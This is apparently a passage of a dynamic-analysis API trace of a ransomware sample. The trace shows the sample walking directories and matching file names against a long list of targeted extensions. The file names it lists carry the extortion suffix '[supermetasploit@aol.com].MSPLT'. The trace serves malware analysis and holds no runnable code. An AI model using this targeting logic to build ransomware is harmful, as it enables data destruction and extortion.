(lpString1=".mkv", lpString2=".rtf") returned -1 [0169.244] lstrlenW (lpString=".mos") returned 4 [0169.244] lstrcmpiW (lpString1=".mos", lpString2=".rtf") returned -1 [0169.244] lstrlenW (lpString=".mov") returned 4 [0169.244] lstrcmpiW (lpString1=".mov", lpString2=".rtf") returned -1 [0169.244] lstrlenW (lpString=".mp3") returned 4 [0169.244] lstrcmpiW (lpString1=".mp3", lpString2=".rtf") returned -1 [0169.244] lstrlenW (lpString=".mp4") returned 4 [0169.244] lstrcmpiW (lpString1=".mp4", lpString2=".rtf") returned -1 [0169.244] lstrlenW (lpString=".mpeg") returned 5 [0169.244] lstrcmpiW (lpString1=".mpeg", lpString2="a.rtf") returned -1 [0169.244] lstrlenW (lpString=".mpg") returned 4 [0169.244] lstrcmpiW (lpString1=".mpg", lpString2=".rtf") returned -1 [0169.244] lstrlenW (lpString=".mpv") returned 4 [0169.244] lstrcmpiW (lpString1=".mpv", lpString2=".rtf") returned -1 [0169.244] lstrlenW (lpString=".mrw") returned 4 [0169.244] lstrcmpiW (lpString1=".mrw", lpString2=".rtf") returned -1 [0169.244] lstrlenW (lpString=".msg") returned 4 [0169.244] lstrcmpiW (lpString1=".msg", lpString2=".rtf") returned -1 [0169.244] lstrlenW (lpString=".mxl") returned 4 [0169.244] lstrcmpiW (lpString1=".mxl", lpString2=".rtf") returned -1 [0169.244] lstrlenW (lpString=".myd") returned 4 [0169.244] lstrcmpiW (lpString1=".myd", lpString2=".rtf") returned -1 [0169.244] lstrlenW (lpString=".myi") returned 4 [0169.244] lstrcmpiW (lpString1=".myi", lpString2=".rtf") returned -1 [0169.244] lstrlenW (lpString=".nef") returned 4 [0169.245] lstrcmpiW (lpString1=".nef", lpString2=".rtf") returned -1 [0169.245] lstrlenW (lpString=".nrw") returned 4 [0169.245] lstrcmpiW (lpString1=".nrw", lpString2=".rtf") returned -1 [0169.245] lstrlenW (lpString=".obj") returned 4 [0169.245] lstrcmpiW (lpString1=".obj", lpString2=".rtf") returned -1 [0169.245] lstrlenW (lpString=".odb") returned 4 [0169.245] lstrcmpiW (lpString1=".odb", lpString2=".rtf") returned -1 [0169.245] lstrlenW (lpString=".odc") returned 4 [0169.245] lstrcmpiW (lpString1=".odc", lpString2=".rtf") returned -1 [0169.245] lstrlenW (lpString=".odm") returned 4 [0169.245] lstrcmpiW (lpString1=".odm", lpString2=".rtf") returned -1 [0169.245] lstrlenW (lpString=".odp") returned 4 [0169.245] lstrcmpiW (lpString1=".odp", lpString2=".rtf") returned -1 [0169.245] lstrlenW (lpString=".ods") returned 4 [0169.245] lstrcmpiW (lpString1=".ods", lpString2=".rtf") returned -1 [0169.245] lstrlenW (lpString=".oft") returned 4 [0169.245] lstrcmpiW (lpString1=".oft", lpString2=".rtf") returned -1 [0169.245] lstrlenW (lpString=".one") returned 4 [0169.245] lstrcmpiW (lpString1=".one", lpString2=".rtf") returned -1 [0169.245] lstrlenW (lpString=".onepkg") returned 7 [0169.245] lstrcmpiW (lpString1=".onepkg", lpString2="ula.rtf") returned -1 [0169.245] lstrlenW (lpString=".onetoc2") returned 8 [0169.245] lstrcmpiW (lpString1=".onetoc2", lpString2="eula.rtf") returned -1 [0169.245] lstrlenW (lpString=".opt") returned 4 [0169.245] lstrcmpiW (lpString1=".opt", lpString2=".rtf") returned -1 [0169.245] lstrlenW (lpString=".oqy") returned 4 [0169.245] lstrcmpiW (lpString1=".oqy", lpString2=".rtf") returned -1 [0169.245] lstrlenW (lpString=".orf") returned 4 [0169.245] lstrcmpiW (lpString1=".orf", lpString2=".rtf") returned -1 [0169.246] lstrlenW (lpString=".p12") returned 4 [0169.246] lstrcmpiW (lpString1=".p12", lpString2=".rtf") returned -1 [0169.246] lstrlenW (lpString=".p7b") returned 4 [0169.246] lstrcmpiW (lpString1=".p7b", lpString2=".rtf") returned -1 [0169.246] lstrlenW (lpString=".p7c") returned 4 [0169.246] lstrcmpiW (lpString1=".p7c", lpString2=".rtf") returned -1 [0169.246] lstrlenW (lpString=".pam") returned 4 [0169.246] lstrcmpiW (lpString1=".pam", lpString2=".rtf") returned -1 [0169.246] lstrlenW (lpString=".pbm") returned 4 [0169.246] lstrcmpiW (lpString1=".pbm", lpString2=".rtf") returned -1 [0169.246] lstrlenW (lpString=".pct") returned 4 [0169.246] lstrcmpiW (lpString1=".pct", lpString2=".rtf") returned -1 [0169.246] lstrlenW (lpString=".pcx") returned 4 [0169.246] lstrcmpiW (lpString1=".pcx", lpString2=".rtf") returned -1 [0169.246] lstrlenW (lpString=".pdd") returned 4 [0169.246] lstrcmpiW (lpString1=".pdd", lpString2=".rtf") returned -1 [0169.246] lstrlenW (lpString=".pdf") returned 4 [0169.246] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0169.246] lstrlenW (lpString=".pdp") returned 4 [0169.246] lstrcmpiW (lpString1=".pdp", lpString2=".rtf") returned -1 [0169.246] lstrlenW (lpString=".pef") returned 4 [0169.246] lstrcmpiW (lpString1=".pef", lpString2=".rtf") returned -1 [0169.246] lstrlenW (lpString=".pem") returned 4 [0169.246] lstrcmpiW (lpString1=".pem", lpString2=".rtf") returned -1 [0169.246] lstrlenW (lpString=".pff") returned 4 [0169.246] lstrcmpiW (lpString1=".pff", lpString2=".rtf") returned -1 [0169.246] lstrlenW (lpString=".pfm") returned 4 [0169.246] lstrcmpiW (lpString1=".pfm", lpString2=".rtf") returned -1 [0169.247] lstrlenW (lpString=".pfx") returned 4 [0169.247] lstrcmpiW (lpString1=".pfx", lpString2=".rtf") returned -1 [0169.247] lstrlenW (lpString=".pgm") returned 4 [0169.247] lstrcmpiW (lpString1=".pgm", lpString2=".rtf") returned -1 [0169.247] lstrlenW (lpString=".php") returned 4 [0169.247] lstrcmpiW (lpString1=".php", lpString2=".rtf") returned -1 [0169.247] lstrlenW (lpString=".php3") returned 5 [0169.247] lstrcmpiW (lpString1=".php3", lpString2="a.rtf") returned -1 [0169.247] lstrlenW (lpString=".php4") returned 5 [0169.247] lstrcmpiW (lpString1=".php4", lpString2="a.rtf") returned -1 [0169.247] lstrlenW (lpString=".php5") returned 5 [0169.247] lstrcmpiW (lpString1=".php5", lpString2="a.rtf") returned -1 [0169.247] lstrlenW (lpString=".phtml") returned 6 [0169.247] lstrcmpiW (lpString1=".phtml", lpString2="la.rtf") returned -1 [0169.247] lstrlenW (lpString=".pict") returned 5 [0169.247] lstrcmpiW (lpString1=".pict", lpString2="a.rtf") returned -1 [0169.247] lstrlenW (lpString=".pl") returned 3 [0169.247] lstrcmpiW (lpString1=".pl", lpString2="rtf") returned -1 [0169.247] lstrlenW (lpString=".pls") returned 4 [0169.247] lstrcmpiW (lpString1=".pls", lpString2=".rtf") returned -1 [0169.247] lstrlenW (lpString=".pm") returned 3 [0169.247] lstrcmpiW (lpString1=".pm", lpString2="rtf") returned -1 [0169.247] lstrlenW (lpString=".png") returned 4 [0169.247] lstrcmpiW (lpString1=".png", lpString2=".rtf") returned -1 [0169.247] lstrlenW (lpString=".pnm") returned 4 [0169.247] lstrcmpiW (lpString1=".pnm", lpString2=".rtf") returned -1 [0169.247] lstrlenW (lpString=".pot") returned 4 [0169.248] lstrcmpiW (lpString1=".pot", lpString2=".rtf") returned -1 [0169.248] lstrlenW (lpString=".potm") returned 5 [0169.248] lstrcmpiW (lpString1=".potm", lpString2="a.rtf") returned -1 [0169.248] lstrlenW (lpString=".potx") returned 5 [0169.248] lstrcmpiW (lpString1=".potx", lpString2="a.rtf") returned -1 [0169.248] lstrlenW (lpString=".ppa") returned 4 [0169.248] lstrcmpiW (lpString1=".ppa", lpString2=".rtf") returned -1 [0169.248] lstrlenW (lpString=".ppam") returned 5 [0169.248] lstrcmpiW (lpString1=".ppam", lpString2="a.rtf") returned -1 [0169.248] lstrlenW (lpString=".ppm") returned 4 [0169.248] lstrcmpiW (lpString1=".ppm", lpString2=".rtf") returned -1 [0169.248] lstrlenW (lpString=".pps") returned 4 [0169.248] lstrcmpiW (lpString1=".pps", lpString2=".rtf") returned -1 [0169.248] lstrlenW (lpString=".ppsm") returned 5 [0169.248] lstrcmpiW (lpString1=".ppsm", lpString2="a.rtf") returned -1 [0169.248] lstrlenW (lpString=".ppt") returned 4 [0169.248] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0169.248] lstrlenW (lpString=".pptm") returned 5 [0169.248] lstrcmpiW (lpString1=".pptm", lpString2="a.rtf") returned -1 [0169.248] lstrlenW (lpString=".pptx") returned 5 [0169.248] lstrcmpiW (lpString1=".pptx", lpString2="a.rtf") returned -1 [0169.248] lstrlenW (lpString=".prn") returned 4 [0169.248] lstrcmpiW (lpString1=".prn", lpString2=".rtf") returned -1 [0169.248] lstrlenW (lpString=".ps") returned 3 [0169.248] lstrcmpiW (lpString1=".ps", lpString2="rtf") returned -1 [0169.248] lstrlenW (lpString=".psb") returned 4 [0169.248] lstrcmpiW (lpString1=".psb", lpString2=".rtf") returned -1 [0169.249] lstrlenW (lpString=".psd") returned 4 [0169.249] lstrcmpiW (lpString1=".psd", lpString2=".rtf") returned -1 [0169.249] lstrlenW (lpString=".pst") returned 4 [0169.249] lstrcmpiW (lpString1=".pst", lpString2=".rtf") returned -1 [0169.249] lstrlenW (lpString=".ptx") returned 4 [0169.249] lstrcmpiW (lpString1=".ptx", lpString2=".rtf") returned -1 [0169.249] lstrlenW (lpString=".pub") returned 4 [0169.249] lstrcmpiW (lpString1=".pub", lpString2=".rtf") returned -1 [0169.249] lstrlenW (lpString=".pwm") returned 4 [0169.249] lstrcmpiW (lpString1=".pwm", lpString2=".rtf") returned -1 [0169.249] lstrlenW (lpString=".pxr") returned 4 [0169.249] lstrcmpiW (lpString1=".pxr", lpString2=".rtf") returned -1 [0169.249] lstrlenW (lpString=".py") returned 3 [0169.249] lstrcmpiW (lpString1=".py", lpString2="rtf") returned -1 [0169.249] lstrlenW (lpString=".qt") returned 3 [0169.249] lstrcmpiW (lpString1=".qt", lpString2="rtf") returned -1 [0169.249] lstrlenW (lpString=".r3d") returned 4 [0169.249] lstrcmpiW (lpString1=".r3d", lpString2=".rtf") returned -1 [0169.249] lstrlenW (lpString=".raf") returned 4 [0169.249] lstrcmpiW (lpString1=".raf", lpString2=".rtf") returned -1 [0169.249] lstrlenW (lpString=".rar") returned 4 [0169.249] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0169.249] FindNextFileW (in: hFindFile=0x8022d8, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a09bbd7, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5a09bbd7, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a09bbd7, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0169.250] FindNextFileW (in: hFindFile=0x8022d8, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x59e85ba4, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x59e85ba4, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59e85ba4, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x142a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0169.250] FindNextFileW (in: hFindFile=0x8022d8, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0169.250] FindNextFileW (in: hFindFile=0x8022d8, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0169.250] FindClose (in: hFindFile=0x8022d8 | out: hFindFile=0x8022d8) returned 1 [0169.250] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0169.250] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1032", cAlternateFileName="")) returned 1 [0169.250] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3e90058 [0169.250] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032") returned 26 [0169.251] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1032\\*", lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x5a691966, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x801e98 [0169.761] FindNextFileW (in: hFindFile=0x801e98, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x5a691966, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.761] FindNextFileW (in: hFindFile=0x801e98, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5a1347e3, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5a1347e3, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a66b8c8, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x2394, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0169.761] lstrlenW (lpString="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT") returned 52 [0169.762] lstrlenW (lpString=".1cd") returned 4 [0169.762] lstrcmpiW (lpString1=".1cd", lpString2="SPLT") returned -1 [0169.762] lstrlenW (lpString=".3ds") returned 4 [0169.762] lstrcmpiW (lpString1=".3ds", lpString2="SPLT") returned -1 [0169.762] lstrlenW (lpString=".3fr") returned 4 [0169.762] lstrcmpiW (lpString1=".3fr", lpString2="SPLT") returned -1 [0169.762] lstrlenW (lpString=".3g2") returned 4 [0169.762] lstrcmpiW (lpString1=".3g2", lpString2="SPLT") returned -1 [0169.762] lstrlenW (lpString=".3gp") returned 4 [0169.762] lstrcmpiW (lpString1=".3gp", lpString2="SPLT") returned -1 [0169.762] lstrlenW (lpString=".7z") returned 3 [0169.762] lstrcmpiW (lpString1=".7z", lpString2="PLT") returned -1 [0169.762] lstrlenW (lpString=".accda") returned 6 [0169.762] lstrcmpiW (lpString1=".accda", lpString2=".MSPLT") returned -1 [0169.762] lstrlenW (lpString=".accdb") returned 6 [0169.762] lstrcmpiW (lpString1=".accdb", lpString2=".MSPLT") returned -1 [0169.762] lstrlenW (lpString=".accdc") returned 6 [0169.762] lstrcmpiW (lpString1=".accdc", lpString2=".MSPLT") returned -1 [0169.762] lstrlenW (lpString=".accde") returned 6 [0169.762] lstrcmpiW (lpString1=".accde", lpString2=".MSPLT") returned -1 [0169.762] lstrlenW (lpString=".accdt") returned 6 [0169.762] lstrcmpiW (lpString1=".accdt", lpString2=".MSPLT") returned -1 [0169.762] lstrlenW (lpString=".accdw") returned 6 [0169.762] lstrcmpiW (lpString1=".accdw", lpString2=".MSPLT") returned -1 [0169.762] lstrlenW (lpString=".adb") returned 4 [0169.762] lstrcmpiW (lpString1=".adb", lpString2="SPLT") returned -1 [0169.762] lstrlenW (lpString=".adp") returned 4 [0169.762] lstrcmpiW (lpString1=".adp", lpString2="SPLT") returned -1 [0169.762] lstrlenW (lpString=".ai") returned 3 [0169.762] lstrcmpiW (lpString1=".ai", lpString2="PLT") returned -1 [0169.762] lstrlenW (lpString=".ai3") returned 4 [0169.762] lstrcmpiW (lpString1=".ai3", lpString2="SPLT") returned -1 [0169.762] lstrlenW (lpString=".ai4") returned 4 [0169.762] lstrcmpiW (lpString1=".ai4", lpString2="SPLT") returned -1 [0169.762] lstrlenW (lpString=".ai5") returned 4 [0169.763] lstrcmpiW (lpString1=".ai5", lpString2="SPLT") returned -1 [0169.763] lstrlenW (lpString=".ai6") returned 4 [0169.763] lstrcmpiW (lpString1=".ai6", lpString2="SPLT") returned -1 [0169.763] lstrlenW (lpString=".ai7") returned 4 [0169.763] lstrcmpiW (lpString1=".ai7", lpString2="SPLT") returned -1 [0169.763] lstrlenW (lpString=".ai8") returned 4 [0169.763] lstrcmpiW (lpString1=".ai8", lpString2="SPLT") returned -1 [0169.763] lstrlenW (lpString=".anim") returned 5 [0169.763] lstrcmpiW (lpString1=".anim", lpString2="MSPLT") returned -1 [0169.763] lstrlenW (lpString=".arw") returned 4 [0169.763] lstrcmpiW (lpString1=".arw", lpString2="SPLT") returned -1 [0169.763] lstrlenW (lpString=".as") returned 3 [0169.763] lstrcmpiW (lpString1=".as", lpString2="PLT") returned -1 [0169.763] lstrlenW (lpString=".asa") returned 4 [0169.763] lstrcmpiW (lpString1=".asa", lpString2="SPLT") returned -1 [0169.763] lstrlenW (lpString=".asc") returned 4 [0169.763] lstrcmpiW (lpString1=".asc", lpString2="SPLT") returned -1 [0169.763] lstrlenW (lpString=".ascx") returned 5 [0169.763] lstrcmpiW (lpString1=".ascx", lpString2="MSPLT") returned -1 [0169.763] lstrlenW (lpString=".asm") returned 4 [0169.763] lstrcmpiW (lpString1=".asm", lpString2="SPLT") returned -1 [0169.763] lstrlenW (lpString=".asmx") returned 5 [0169.763] lstrcmpiW (lpString1=".asmx", lpString2="MSPLT") returned -1 [0169.763] lstrlenW (lpString=".asp") returned 4 [0169.763] lstrcmpiW (lpString1=".asp", lpString2="SPLT") returned -1 [0169.763] lstrlenW (lpString=".aspx") returned 5 [0169.763] lstrcmpiW (lpString1=".aspx", lpString2="MSPLT") returned -1 [0169.763] lstrlenW (lpString=".asr") returned 4 [0169.763] lstrcmpiW (lpString1=".asr", lpString2="SPLT") returned -1 [0169.763] lstrlenW (lpString=".asx") returned 4 [0169.763] lstrcmpiW (lpString1=".asx", lpString2="SPLT") returned -1 [0169.763] lstrlenW (lpString=".avi") returned 4 [0169.763] lstrcmpiW (lpString1=".avi", lpString2="SPLT") returned -1 [0169.763] lstrlenW (lpString=".avs") returned 4 [0169.764] lstrcmpiW (lpString1=".avs", lpString2="SPLT") returned -1 [0169.764] lstrlenW (lpString=".backup") returned 7 [0169.764] lstrcmpiW (lpString1=".backup", lpString2="].MSPLT") returned -1 [0169.764] lstrlenW (lpString=".bak") returned 4 [0169.764] lstrcmpiW (lpString1=".bak", lpString2="SPLT") returned -1 [0169.764] lstrlenW (lpString=".bay") returned 4 [0169.764] lstrcmpiW (lpString1=".bay", lpString2="SPLT") returned -1 [0169.764] lstrlenW (lpString=".bd") returned 3 [0169.764] lstrcmpiW (lpString1=".bd", lpString2="PLT") returned -1 [0169.764] lstrlenW (lpString=".bin") returned 4 [0169.764] lstrcmpiW (lpString1=".bin", lpString2="SPLT") returned -1 [0169.764] lstrlenW (lpString=".bmp") returned 4 [0169.764] lstrcmpiW (lpString1=".bmp", lpString2="SPLT") returned -1 [0169.764] lstrlenW (lpString=".bz2") returned 4 [0169.764] lstrcmpiW (lpString1=".bz2", lpString2="SPLT") returned -1 [0169.764] lstrlenW (lpString=".c") returned 2 [0169.764] lstrcmpiW (lpString1=".c", lpString2="LT") returned -1 [0169.764] lstrlenW (lpString=".cdr") returned 4 [0169.764] lstrcmpiW (lpString1=".cdr", lpString2="SPLT") returned -1 [0169.764] lstrlenW (lpString=".cer") returned 4 [0169.764] lstrcmpiW (lpString1=".cer", lpString2="SPLT") returned -1 [0169.764] lstrlenW (lpString=".cf") returned 3 [0169.764] lstrcmpiW (lpString1=".cf", lpString2="PLT") returned -1 [0169.764] lstrlenW (lpString=".cfc") returned 4 [0169.764] lstrcmpiW (lpString1=".cfc", lpString2="SPLT") returned -1 [0169.764] lstrlenW (lpString=".cfm") returned 4 [0169.764] lstrcmpiW (lpString1=".cfm", lpString2="SPLT") returned -1 [0169.764] lstrlenW (lpString=".cfml") returned 5 [0169.764] lstrcmpiW (lpString1=".cfml", lpString2="MSPLT") returned -1 [0169.764] lstrlenW (lpString=".cfu") returned 4 [0169.764] lstrcmpiW (lpString1=".cfu", lpString2="SPLT") returned -1 [0169.764] lstrlenW (lpString=".chm") returned 4 [0169.764] lstrcmpiW (lpString1=".chm", lpString2="SPLT") returned -1 [0169.765] lstrlenW (lpString=".cin") returned 4 [0169.765] lstrcmpiW (lpString1=".cin", lpString2="SPLT") returned -1 [0169.765] lstrlenW (lpString=".class") returned 6 [0169.765] lstrcmpiW (lpString1=".class", lpString2=".MSPLT") returned -1 [0169.765] lstrlenW (lpString=".clx") returned 4 [0169.765] lstrcmpiW (lpString1=".clx", lpString2="SPLT") returned -1 [0169.765] lstrlenW (lpString=".config") returned 7 [0169.765] lstrcmpiW (lpString1=".config", lpString2="].MSPLT") returned -1 [0169.765] lstrlenW (lpString=".cpp") returned 4 [0169.765] lstrcmpiW (lpString1=".cpp", lpString2="SPLT") returned -1 [0169.765] lstrlenW (lpString=".cr2") returned 4 [0169.765] lstrcmpiW (lpString1=".cr2", lpString2="SPLT") returned -1 [0169.765] lstrlenW (lpString=".crt") returned 4 [0169.765] lstrcmpiW (lpString1=".crt", lpString2="SPLT") returned -1 [0169.765] lstrlenW (lpString=".crw") returned 4 [0169.765] lstrcmpiW (lpString1=".crw", lpString2="SPLT") returned -1 [0169.765] lstrlenW (lpString=".cs") returned 3 [0169.765] lstrcmpiW (lpString1=".cs", lpString2="PLT") returned -1 [0169.765] lstrlenW (lpString=".css") returned 4 [0169.765] lstrcmpiW (lpString1=".css", lpString2="SPLT") returned -1 [0169.765] lstrlenW (lpString=".csv") returned 4 [0169.765] lstrcmpiW (lpString1=".csv", lpString2="SPLT") returned -1 [0169.765] lstrlenW (lpString=".cub") returned 4 [0169.765] lstrcmpiW (lpString1=".cub", lpString2="SPLT") returned -1 [0169.765] lstrlenW (lpString=".dae") returned 4 [0169.765] lstrcmpiW (lpString1=".dae", lpString2="SPLT") returned -1 [0169.765] lstrlenW (lpString=".dat") returned 4 [0169.766] lstrcmpiW (lpString1=".dat", lpString2="SPLT") returned -1 [0169.766] lstrlenW (lpString=".db") returned 3 [0169.766] lstrcmpiW (lpString1=".db", lpString2="PLT") returned -1 [0169.766] lstrlenW (lpString=".dbf") returned 4 [0169.766] lstrcmpiW (lpString1=".dbf", lpString2="SPLT") returned -1 [0169.766] lstrlenW (lpString=".dbx") returned 4 [0169.766] lstrcmpiW (lpString1=".dbx", lpString2="SPLT") returned -1 [0169.766] lstrlenW (lpString=".dc3") returned 4 [0169.766] lstrcmpiW (lpString1=".dc3", lpString2="SPLT") returned -1 [0169.766] lstrlenW (lpString=".dcm") returned 4 [0169.766] lstrcmpiW (lpString1=".dcm", lpString2="SPLT") returned -1 [0169.766] lstrlenW (lpString=".dcr") returned 4 [0169.766] lstrcmpiW (lpString1=".dcr", lpString2="SPLT") returned -1 [0169.766] lstrlenW (lpString=".der") returned 4 [0169.766] lstrcmpiW (lpString1=".der", lpString2="SPLT") returned -1 [0169.766] lstrlenW (lpString=".dib") returned 4 [0169.766] lstrcmpiW (lpString1=".dib", lpString2="SPLT") returned -1 [0169.766] lstrlenW (lpString=".dic") returned 4 [0169.766] lstrcmpiW (lpString1=".dic", lpString2="SPLT") returned -1 [0169.766] lstrlenW (lpString=".dif") returned 4 [0169.766] lstrcmpiW (lpString1=".dif", lpString2="SPLT") returned -1 [0169.766] lstrlenW (lpString=".divx") returned 5 [0169.766] lstrcmpiW (lpString1=".divx", lpString2="MSPLT") returned -1 [0169.766] lstrlenW (lpString=".djvu") returned 5 [0169.766] lstrcmpiW (lpString1=".djvu", lpString2="MSPLT") returned -1 [0169.766] lstrlenW (lpString=".dng") returned 4 [0169.766] lstrcmpiW (lpString1=".dng", lpString2="SPLT") returned -1 [0169.766] lstrlenW (lpString=".doc") returned 4 [0169.766] lstrcmpiW (lpString1=".doc", lpString2="SPLT") returned -1 [0169.766] lstrlenW (lpString=".docm") returned 5 [0169.766] lstrcmpiW (lpString1=".docm", lpString2="MSPLT") returned -1 [0169.766] lstrlenW (lpString=".docx") returned 5 [0169.766] lstrcmpiW (lpString1=".docx", lpString2="MSPLT") returned -1 [0169.766] lstrlenW (lpString=".dot") returned 4 [0169.767] lstrcmpiW (lpString1=".dot", lpString2="SPLT") returned -1 [0169.767] lstrlenW (lpString=".dotm") returned 5 [0169.767] lstrcmpiW (lpString1=".dotm", lpString2="MSPLT") returned -1 [0169.767] lstrlenW (lpString=".dotx") returned 5 [0169.767] lstrcmpiW (lpString1=".dotx", lpString2="MSPLT") returned -1 [0169.767] lstrlenW (lpString=".dpx") returned 4 [0169.767] lstrcmpiW (lpString1=".dpx", lpString2="SPLT") returned -1 [0169.767] lstrlenW (lpString=".dqy") returned 4 [0169.767] lstrcmpiW (lpString1=".dqy", lpString2="SPLT") returned -1 [0169.767] lstrlenW (lpString=".dsn") returned 4 [0169.767] lstrcmpiW (lpString1=".dsn", lpString2="SPLT") returned -1 [0169.767] lstrlenW (lpString=".dt") returned 3 [0169.767] lstrcmpiW (lpString1=".dt", lpString2="PLT") returned -1 [0169.767] lstrlenW (lpString=".dtd") returned 4 [0169.767] lstrcmpiW (lpString1=".dtd", lpString2="SPLT") returned -1 [0169.767] lstrlenW (lpString=".dwg") returned 4 [0169.767] lstrcmpiW (lpString1=".dwg", lpString2="SPLT") returned -1 [0169.767] lstrlenW (lpString=".dwt") returned 4 [0169.767] lstrcmpiW (lpString1=".dwt", lpString2="SPLT") returned -1 [0169.767] lstrlenW (lpString=".dx") returned 3 [0169.767] lstrcmpiW (lpString1=".dx", lpString2="PLT") returned -1 [0169.767] lstrlenW (lpString=".dxf") returned 4 [0169.767] lstrcmpiW (lpString1=".dxf", lpString2="SPLT") returned -1 [0169.767] lstrlenW (lpString=".edml") returned 5 [0169.767] lstrcmpiW (lpString1=".edml", lpString2="MSPLT") returned -1 [0169.767] lstrlenW (lpString=".efd") returned 4 [0169.767] lstrcmpiW (lpString1=".efd", lpString2="SPLT") returned -1 [0169.767] lstrlenW (lpString=".elf") returned 4 [0169.767] lstrcmpiW (lpString1=".elf", lpString2="SPLT") returned -1 [0169.767] lstrlenW (lpString=".emf") returned 4 [0169.768] lstrcmpiW (lpString1=".emf", lpString2="SPLT") returned -1 [0169.768] lstrlenW (lpString=".emz") returned 4 [0169.768] lstrcmpiW (lpString1=".emz", lpString2="SPLT") returned -1 [0169.768] lstrlenW (lpString=".epf") returned 4 [0169.768] lstrcmpiW (lpString1=".epf", lpString2="SPLT") returned -1 [0169.768] lstrlenW (lpString=".eps") returned 4 [0169.768] lstrcmpiW (lpString1=".eps", lpString2="SPLT") returned -1 [0169.768] lstrlenW (lpString=".epsf") returned 5 [0169.768] lstrcmpiW (lpString1=".epsf", lpString2="MSPLT") returned -1 [0169.768] lstrlenW (lpString=".epsp") returned 5 [0169.768] lstrcmpiW (lpString1=".epsp", lpString2="MSPLT") returned -1 [0169.768] lstrlenW (lpString=".erf") returned 4 [0169.768] lstrcmpiW (lpString1=".erf", lpString2="SPLT") returned -1 [0169.768] lstrlenW (lpString=".exr") returned 4 [0169.768] lstrcmpiW (lpString1=".exr", lpString2="SPLT") returned 